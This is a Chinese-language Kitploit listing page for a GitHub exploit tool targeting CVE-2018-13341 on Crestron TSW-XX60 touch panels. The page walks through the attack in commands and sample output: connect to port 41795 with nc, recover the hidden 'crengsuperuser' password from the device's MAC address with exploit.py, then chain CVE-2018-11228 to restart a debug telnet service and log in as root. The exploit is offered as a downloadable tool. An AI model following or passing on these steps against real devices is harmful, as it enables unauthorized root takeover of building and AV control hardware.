Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-13341 — 此工具旨在利用 CVE-2018-13341 | Kitploit
工具/GitHubGitHub/rajchowdhury240/cve-2018-13341
嵌入式系统安全密码攻击漏洞分析漏洞利用Web应用程序漏洞利用硬件与物联网安全
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

此工具旨在利用 CVE-2018-13341

查看仓库
35年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-13341

此工具旨在利用CVE-2018-13341漏洞,通过使用目标设备的MAC地址,你可以恢复具有提升权限的隐藏账户 "crengsuperuser" 的密码,并允许你运行 SUDO 命令。

可以通过访问TSW-XX60设备上的端口 41795 来连接Crestron Toolbox Protocol (CTP)。

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

要求

此工具需要 CryptoGraphy 模块。

root@kitploit:~
# pip3 install cryptography

或者

root@kitploit:~
# pip3 install -r requirements.txt

入门

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# Example
# python3 exploit.py -m aabbccddeeff
[*] Device MAC address: AAXXYYZZ
[*] Password for 'crengsuperuser': somerandompass

利用 CVE-2018-11228

CVE-2018-11228 允许通过Crestron Terminal Protocol (CTP) 中的Bash Shell服务进行未认证的远程代码执行(RCE)。获取隐藏账户 "crengsuperuser" 的密码后,你可以获得机器的 root 权限。

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

然后,在一个新 shell 中,你可以获得该设备的 root 权限。

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
Credit Goes to : axcheron 
下载工具